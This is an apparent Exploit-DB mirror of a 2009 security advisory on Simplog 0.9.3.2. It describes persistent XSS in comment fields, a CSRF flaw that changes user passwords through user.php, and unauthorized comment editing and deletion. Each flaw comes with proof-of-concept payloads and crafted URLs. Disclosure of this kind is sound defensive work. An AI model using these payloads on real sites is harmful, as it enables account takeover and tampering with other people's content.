- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10180
- Проверка EDB
-
- Пройдено
- Автор
- AMOL NAIK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4093 cve-2009-4092 cve-2009-4091
- Дата публикации
- 2009-11-16
Код:
################################################################################
Mutliple Vulnerabilities in Simplog v0.9.3.2
Name Multiple vulnerabilities in Simplog
Systems Affected Simplog 0.9.3.2 and possibly earlier versions
Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
Author Amol Naik (amolnaik4[at]gmail.com)
Date 16/11/2009
################################################################################
############
1. OVERVIEW
############
Simplog provides an easy way for users to add blogging capabilities to their existing websites.
Simplog is written in PHP and compatible with multiple databases.
Simplog also features an RSS/Atom aggregator/reader.
###############
2. DESCRIPTION
###############
Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.
######################
3. TECHNICAL DETAILS
######################
Summery:
(A) Persistent Cross-site Scripting
(B) Cross Site Request Forgery
(C) Edit/Delete Comments (Bypassing Authorization)
(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++
Vulnerable page comments.php
Vulnerable Parameters cname, email
When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.
++++
POC
++++
Put this in the comment:
Name: alert("AMol_NAik")
email:">alert("AMol_NAik")
(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++
Vulnerable Page user.php
This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.
++++
POC
++++
http://server/simplog/user.php?pass1=&pass2=&blogid=&act=change
For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".
http://server/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change
(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable Page comments.php
Vulnerable Parameters op, cid
The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.
++++
POC
++++
Edit comment: http://server/simplog/comments.php?op=edit&cid=
Delete Comment: http://server/simplog/comments.php?op=del&cid=
############
4. TimeLine
############
03/11/2009 Bug Discovered
03/11/2009 Reported to Vendor
16/11/2009 No response received till the date
16/11/2009 Public Disclosure
- Источник
- www.exploit-db.com